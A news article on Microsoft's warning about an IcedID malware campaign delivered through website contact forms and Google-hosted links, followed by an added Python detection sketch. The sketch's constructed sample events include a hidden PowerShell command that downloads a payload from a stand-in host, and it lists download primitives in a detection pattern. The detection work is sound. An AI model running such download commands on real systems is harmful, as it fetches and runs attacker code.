Microsoft has warned of a new and unusual malware campaign that reaches targets through websites' contact forms, using fake legal threats as the lure.
The attackers use legitimate Google URLs to gain a foothold on the victim's computer. The URLs prompt the target to sign in with their Google credentials, after which the system is compromised.
According to Microsoft, attackers are abusing the contact forms on websites to deliver malicious links. The resulting emails contain a link that supposedly lets the target review the evidence behind the allegation. Clicking the link downloads a malware called IcedID, which can steal data from the computer and can also lead to the installation of ransomware. The attackers use Google URLs so that the link appears safe to click.
Microsoft said in the blog post: “After the email recipient signs in, the sites.google.com page automatically downloads a malicious ZIP file, which contains a heavily obfuscated .js file. The malicious .js file is executed via WScript to create a shell object for launching PowerShell to download the IcedID payload (a .dat file), which is decrypted by a dropped DLL loader, as well as a Cobalt Strike beacon in the form of a stageless DLL, allowing attackers to remotely control the compromised device.”
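As an added illustration that is not part of Microsoft's post, the following Python sketch flags the execution chain the quote describes (wscript.exe running a .js file and spawning a PowerShell download) over a few constructed process-creation events. The event fields, process IDs and command lines are assumptions modelled loosely on Sysmon process-creation records, not real telemetry.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation event (fields assumed, Sysmon-like)."""
    pid: int
    ppid: int
    image: str
    cmdline: str

# Constructed sample events: a script host launched from Explorer spawns a
# hidden PowerShell that downloads a .dat payload; a benign PowerShell is
# included as a control. None of these values are real indicators.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\Downloads\document_123.js"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/p.dat','C:\\Temp\\p.dat')\""),
    ProcEvent(400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Date"),
]

# Command-line fragments that commonly indicate a download from PowerShell.
DOWNLOAD_PATTERN = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def find_script_host_download_chains(events):
    """Return hits where a Windows script host is the direct parent of a
    PowerShell process whose command line contains a download primitive."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in SCRIPT_HOSTS:
            continue
        if not DOWNLOAD_PATTERN.search(e.cmdline):
            continue
        hits.append({"parent_pid": parent.pid, "child_pid": e.pid,
                     "script": parent.cmdline, "download_cmd": e.cmdline,
                     "script_is_js": ".js" in parent.cmdline.lower()})
    return hits

if __name__ == "__main__":
    for hit in find_script_host_download_chains(SAMPLE_EVENTS):
        print(hit)
```

Real telemetry will also show the later stages (the DLL loader and the stageless Cobalt Strike DLL), which this check deliberately does not model.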